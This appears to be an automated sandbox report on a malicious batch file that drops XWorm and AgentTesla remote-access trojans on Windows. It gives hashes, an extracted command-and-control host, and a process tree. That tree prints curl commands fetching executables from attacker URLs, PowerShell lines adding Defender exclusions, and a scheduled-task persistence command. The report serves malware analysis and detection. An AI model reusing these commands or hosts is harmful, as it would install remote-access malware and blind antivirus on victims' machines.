Analysis
-
max time kernel
54s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 19:44
Static task
static1
Behavioral task
behavioral1
Sample
#πΎπ βπππΌβπ ππ.π.bat
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
#πΎπ βπππΌβπ ππ.π.bat
Resource
win10v2004-20231127-en
General
-
Target
#πΎπ βπππΌβπ ππ.π.bat
-
Size
20KB
-
MD5
a7793c10f4e024c789964be67375ab2a
-
SHA1
988d0af9a4ca435dd084ce541a250f6ba57f590a
-
SHA256
770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
-
SHA512
50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
-
SSDEEP
384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO
Malware Config
Extracted
xworm
goofyah-26004.portmap.host:26004
-
Install_directory
%AppData%
-
install_file
GVClientV4.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 6 IoCs
Processes:
resource yara_rule C:\Windows\GV Client V4 BETA.exe family_xworm C:\Windows\GV Client V4 BETA.exe family_xworm C:\Windows\GV Client V4 BETA.exe family_xworm behavioral2/memory/2216-27-0x0000000000830000-0x000000000084A000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\GVClientV4.exe family_xworm C:\Users\Admin\AppData\Roaming\GVClientV4.exe family_xworm -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1408-14-0x0000021F5DCF0000-0x0000021F5DF06000-memory.dmp family_agenttesla -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a.exeGV Client V4 BETA.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation a.exe Key value queried \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation GV Client V4 BETA.exe -
Drops startup file 2 IoCs
Processes:
GV Client V4 BETA.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk GV Client V4 BETA.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk GV Client V4 BETA.exe -
Executes dropped EXE 4 IoCs
Processes:
GV-Loader.exea.exeGV Client V4 BETA.exeGVClientV4.exepid process 1408 GV-Loader.exe 4792 a.exe 2216 GV Client V4 BETA.exe 4136 GVClientV4.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
GV Client V4 BETA.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GVClientV4 = "C:\\Users\\Admin\\AppData\\Roaming\\GVClientV4.exe" GV Client V4 BETA.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 47 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
a.exedescription ioc process File created C:\Windows\GV Client V4 BETA.exe a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
GV-Loader.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS GV-Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer GV-Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion GV-Loader.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2456 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
GV Client V4 BETA.exepid process 2216 GV Client V4 BETA.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGV Client V4 BETA.exepid process 2848 powershell.exe 2848 powershell.exe 4912 powershell.exe 4912 powershell.exe 4912 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 5116 powershell.exe 5116 powershell.exe 5116 powershell.exe 4484 powershell.exe 4484 powershell.exe 4484 powershell.exe 2216 GV Client V4 BETA.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
GV-Loader.exeGV Client V4 BETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGVClientV4.exedescription pid process Token: SeDebugPrivilege 1408 GV-Loader.exe Token: SeDebugPrivilege 2216 GV Client V4 BETA.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 2216 GV Client V4 BETA.exe Token: SeShutdownPrivilege 2216 GV Client V4 BETA.exe Token: SeDebugPrivilege 4136 GVClientV4.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
GV Client V4 BETA.exepid process 2216 GV Client V4 BETA.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
cmd.exea.exeGV Client V4 BETA.exedescription pid process target process PID 2036 wrote to memory of 232 2036 cmd.exe cacls.exe PID 2036 wrote to memory of 232 2036 cmd.exe cacls.exe PID 2036 wrote to memory of 1596 2036 cmd.exe curl.exe PID 2036 wrote to memory of 1596 2036 cmd.exe curl.exe PID 2036 wrote to memory of 2728 2036 cmd.exe curl.exe PID 2036 wrote to memory of 2728 2036 cmd.exe curl.exe PID 2036 wrote to memory of 3332 2036 cmd.exe curl.exe PID 2036 wrote to memory of 3332 2036 cmd.exe curl.exe PID 2036 wrote to memory of 2456 2036 cmd.exe notepad.exe PID 2036 wrote to memory of 2456 2036 cmd.exe notepad.exe PID 2036 wrote to memory of 1408 2036 cmd.exe GV-Loader.exe PID 2036 wrote to memory of 1408 2036 cmd.exe GV-Loader.exe PID 2036 wrote to memory of 4792 2036 cmd.exe a.exe PID 2036 wrote to memory of 4792 2036 cmd.exe a.exe PID 2036 wrote to memory of 4792 2036 cmd.exe a.exe PID 2036 wrote to memory of 3228 2036 cmd.exe PING.EXE PID 2036 wrote to memory of 3228 2036 cmd.exe PING.EXE PID 4792 wrote to memory of 2848 4792 a.exe powershell.exe PID 4792 wrote to memory of 2848 4792 a.exe powershell.exe PID 4792 wrote to memory of 2848 4792 a.exe powershell.exe PID 4792 wrote to memory of 2216 4792 a.exe GV Client V4 BETA.exe PID 4792 wrote to memory of 2216 4792 a.exe GV Client V4 BETA.exe PID 2216 wrote to memory of 4912 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 4912 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 4816 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 4816 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 5116 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 5116 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 4484 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 4484 2216 GV Client V4 BETA.exe powershell.exe PID 2216 wrote to memory of 1416 2216 GV Client V4 BETA.exe schtasks.exe PID 2216 wrote to memory of 1416 2216 GV Client V4 BETA.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#πΎπ βπππΌβπ ππ.π.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:232
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe2⤵PID:1596
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt2⤵PID:2728
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe2⤵PID:3332
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exeC:\Users\Admin\AppData\Local\Temp\GV-Loader.exe2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Users\Admin\AppData\Roaming\a.exeC:\Users\Admin\AppData\Roaming\a.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYgBjACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\GV Client V4 BETA.exe"C:\Windows\GV Client V4 BETA.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\GV Client V4 BETA.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GV Client V4 BETA.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GVClientV4.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GVClientV4.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GVClientV4" /tr "C:\Users\Admin\AppData\Roaming\GVClientV4.exe"4⤵
- Creates scheduled task(s)
PID:1416 -
C:\Windows\system32\PING.EXEping -n 5 127.0.0.12⤵
- Runs ping.exe
PID:3228
-
C:\Users\Admin\AppData\Roaming\GVClientV4.exeC:\Users\Admin\AppData\Roaming\GVClientV4.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4136
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD59bc110200117a3752313ca2acaf8a9e1
SHA1fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA5121f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
1.6MB
MD57954b6812ec1eefe82b89dea0c1c8001
SHA1db444d74258448e24d7aa1a26d71cea4c7fe492b
SHA25642810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
SHA512bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5
-
Filesize
555B
MD51c01acde55c409853a8bb588c523e810
SHA1f4be783a9aaec4a89e3631b4e843fcc7d44bfdda
SHA256a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872
SHA512700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
85KB
MD5f4fdac362f860520d28385d92c288a7c
SHA19d7add3ef8a94821eff53b9f3b6634a204248a08
SHA256bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367
SHA512097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c
-
Filesize
85KB
MD5f4fdac362f860520d28385d92c288a7c
SHA19d7add3ef8a94821eff53b9f3b6634a204248a08
SHA256bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367
SHA512097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26
-
Filesize
80KB
MD5687f761162c7f606147b6cb4ec53f1b0
SHA1c5becf98823cf61fa049da30a9bb74819aa62d75
SHA256b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7
SHA51229d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26